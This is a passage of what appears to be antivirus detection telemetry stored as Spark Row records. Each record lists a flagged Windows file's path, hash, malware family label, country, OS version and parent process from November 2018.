  Row(detection=Row(filename='watermark.exe', filepath='\\\\?\\c:\\program files\\microsoft\\watermark.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='76713ebad8aaccef88cbe580ef0b1dc9c258ff0a21b4eb6680217469f0d1da33', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:29:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000ff721', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp000ff721', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:12:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-042150-56c8eac1', filepath='\\\\?\\C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-233739-5B760E05\\AVSCAN-20181102-042150-56C8EAC1', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:58:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\qaqdaezmvmd\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541094360.5bdb3bd87c915', country='DZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Free\\203034025.exe', parentsize=671232, timestamp='2018-11-02T07:41:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T21:52:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b7bfc8200d611f8a178142b9b8bdc3e3e7d16fe99db7b8f45e6068392cc42016.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\B7BFC8200D611F8A178142B9B8BDC3E3E7D16FE99DB7B8F45E6068392CC42016.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b7bfc8200d611f8a178142b9b8bdc3e3e7d16fe99db7b8f45e6068392cc42016', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:52:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='purchase_order.iso', filepath='\\\\.\\C:\\Users\\X\\AppData\\Roaming\\Avira\\Antivirus\\MAIL\\TEMP\\00002474\\ML00201.DIR\\Purchase_Order.iso', filesize=512000, name='TR/Dropper.VB.elr.#M1.#R1'), hash='b87c091078ba4c717c793ace6a45fb5e9265f1200c81c62d5d4a8299bd9b987e', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:17:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f4073c84a63957cecc6e3323a5a6ed1a1ac7a23ab4742bfb9f1be268dbabc81a', filepath='C:\\Users\\X\\Downloads\\t\\ D_\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-26\\F4073C84A63957CECC6E3323A5A6ED1A1AC7A23AB4742BFB9F1BE268DBABC81A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f4073c84a63957cecc6e3323a5a6ed1a1ac7a23ab4742bfb9f1be268dbabc81a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T06:33:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kms10.exe', filepath='c:\\windows\\kms10\\kms10.exe', filesize=2176000, name='SPR/HackKMS.d5c565.#M1.#R1'), hash='d5c56597bf7381a46cd51bc26ff6a004945bc08a2760197ae45b98d904d14268', metadata=Row(cmdline='auto', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-02T11:07:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='malaysia 2013a.exe', filepath='I:\\Local Disk\\maljogja2\\Malaysia 2013A.exe', filesize=1536000, name='W32/Sality.AW.#M1.#R1'), hash='fb589478efc68e5629aecfba8ec434a4e37e02bd9e9fd99c1cb27b640938dc41', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\malpwt2007\\Malaysia PWT 2018I.exe', parentsize=None, timestamp='2018-11-02T07:44:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='! my image.scr', filepath='F:\\! My Image.scr', filesize=0, name='DR/Patched.Ren.Gen.#M2.#R5505'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:41:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='TR/Patched.Gen.#M300.#R2947'), hash='cc673a9e2d5f721c6f90e29ba50f18b6c61f91a3ba47f46e1c0c2ffd14947ffc', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T04:44:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='synctask.exe', filepath='C:\\Users\\X\\AppData\\Local\\29d4af865fc1c2f21c02365364e4bd9d\\synctask.exe', filesize=1600000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='e4b6c38e78ff4fc0d5fbe2998c3558522f1186a370f41cc0a1dd516bb4c88c0b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:56:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='анкеты и заявка на 2018г.exe', filepath='D:\\документы\\Документы отдела кадров\\БГМУ\\Анкеты и заявка на 2018г.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='fd3adfe5baf382fb94fff375be717ca38dc4954f5c595c53d065e346fe458879', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T05:52:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\mqj1auxuk0q\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541143001.5bdbf9d97e0d5', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Free\\602397218.exe', parentsize=671232, timestamp='2018-11-02T07:17:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='eb6b3866a857c6a18d3028dda018818690e0696c082f079e80de4c81343bbb55', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\EB6B3866A857C6A18D3028DDA018818690E0696C082F079E80DE4C81343BBB55', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='eb6b3866a857c6a18d3028dda018818690e0696c082f079e80de4c81343bbb55', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T13:01:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='4352874.vir', filepath='\\\\?\\C:\\Program Files (x86)\\gzpem\\4352874.VIR', filesize=1024000, name='Adware/CsdiMonetize.dxckt.#M1.#R1'), hash='ce7558dac4c120340a90ea7e57498f2e5b5d40aa5f3ed1ee6c161bdfcd1b8009', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:29:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sp33649 help and support center.exe', filepath='\\\\?\\E:\\رعد خاص\\New folder\\رعد 1\\تعريف أشبي\\New Folder\\sp33649 Help and Support Center.exe', filesize=7524000, name='W32/Sality.AT.#M1.#R1'), hash='c591125f7eb22491d0efdf566c3eefd361dafb63e9c9d52fb0a71acb769acbbb', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:45:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202232-bf8f3d8e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202232-BF8F3D8E', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:22:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e5c1', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e5c1', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:59:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00294335', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00294335', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:38:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0159191.exe', filepath='h:\\system volume information\\_restore{fc27124f-d585-4898-9a22-0cd8deaa1a71}\\rp164\\A0159191.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='ad66a8227861a437437b0dbdc49c0fce8009d51425aadd71505accb2aae7d13c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:41:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='patch.exe', filepath='D:\\برامج -2018\\patch.exe', filesize=64000, name='TR/Tiggre.sphdl.#M1.#R1'), hash='dad81d314a1ebcb6d074c930471dab73140dfd91b69335f0dc9c27027f70e8ab', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T10:04:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:33:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='w_cproc_p_11.1.048_redist_intel64.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\COREL X8\\CorelDraw Graphics Suite X8 Multilanguage 32 e 64 Bits\\CorelDRAW X8 32 e 64\\x64\\MSIs\\w_cproc_p_11.1.048_redist_intel64.exe', filesize=512000, name='W32/Stanit.#M1.#R1'), hash='debe1faa480cfe3729607fcfd0648df36b4a96ae658dc0865a0b7b0beac73db7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:28:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:40:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cfp.exe', filepath='C:\\Users\\X\\Desktop\\Miracle Box 2.27A Crac k by HiRSH GSM\\TOOLS\\Blackberry\\cfp\\cfp.exe', filesize=15104000, name='W32/Ramnit.CD.#M1.#R1'), hash='dd5928d6a46fc44a1e0ad820a8c3242a181bc30bd84c972839ef3998ef8eeb85', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe21_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe21 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T15:51:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dd6d2263d3262b60fe6e2a0be799ed305ae3a09787cb8a6182fbeb48e4c630b9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\DD6D2263D3262B60FE6E2A0BE799ED305AE3A09787CB8A6182FBEB48E4C630B9', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='dd6d2263d3262b60fe6e2a0be799ed305ae3a09787cb8a6182fbeb48e4c630b9', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:11:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='libegl.dll', filepath='\\\\?\\C:\\Program Files (x86)\\chroomium Browser\\48.5.2564.88\\libegl.dll', filesize=80000, name='TR/Ghokswa.jlssq.#M1.#R1'), hash='fa0ef7cb9d547661d7f48dca8bd1d69c570339caf685aeb3a79b29356344437e', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:58:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[5].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[5].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[3].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[3].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f55526324e6d6eb210c0cd464baf28bc7f4127b84debc2fcd918c86eec0be458', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\F55526324E6D6EB210C0CD464BAF28BC7F4127B84DEBC2FCD918C86EEC0BE458', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f55526324e6d6eb210c0cd464baf28bc7f4127b84debc2fcd918c86eec0be458', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:51:15Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='coll.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\MODELS\\COLL\\COLL.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='6d6264091d3ff472c7ae4ca57fbf3dc56357a49eb003c497f2b9ed2032db0c23', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:30:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T04:53:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wisper.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\is-V0IPM.tmp\\Wisper.exe', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:38:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='common.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\COMMON\\COMMON.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0000525.exe', filepath='f:\\system volume information\\_restore{08e78a57-b499-42bf-841b-9e69d7dbcbbf}\\rp1\\A0000525.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='4560979d734bc5a796c5681661277604256d28c5675c17c1946961ac9bf3dc81', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:10:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nvidia-forced-10x64-416.16-dis.exe', filepath='D:\\Users\\X\\AppData\\Roaming\\IDM\\DwnlData\\Reza\\nVidia-FORCED-10x64-416.16-Dis_23\\nVidia-FORCED-10x64-416.16-Dis.exe', filesize=43580000, name='HEUR/AGEN.1034275.#M1.#R1'), hash='5b2a75cec743479310d9afacb81942446e5de86d67ad226296464c572e1ff459', metadata=Row(cmdline='\\\\\\/onboot', country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=3986544, timestamp='2018-11-02T12:38:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00010785', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp00010785', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:34:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~ppb836.tmp', filepath='\\\\?\\E:\\Users\\X\\AppData\\Local\\Temp\\~ppB836.tmp', filesize=128000, name='HEUR/AGEN.1030705.#M1.#R1'), hash='3dfb3bcd7618c2bc34a4b30c7062e1d0204afe188d4c326613667d5c1ce30a25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T00:17:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T13:08:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140525-7f1c414d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cab3c85\\AVSCAN-20181102-140456-79007B41\\AVSCAN-20181102-140525-7F1C414D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:05:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp8269062\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:10:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\setup.exe', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T15:53:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160114-f55450d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160114-F55450D6', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T23:41:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:07:09Z'), dt=datetime.date(2018, 11, 2)),
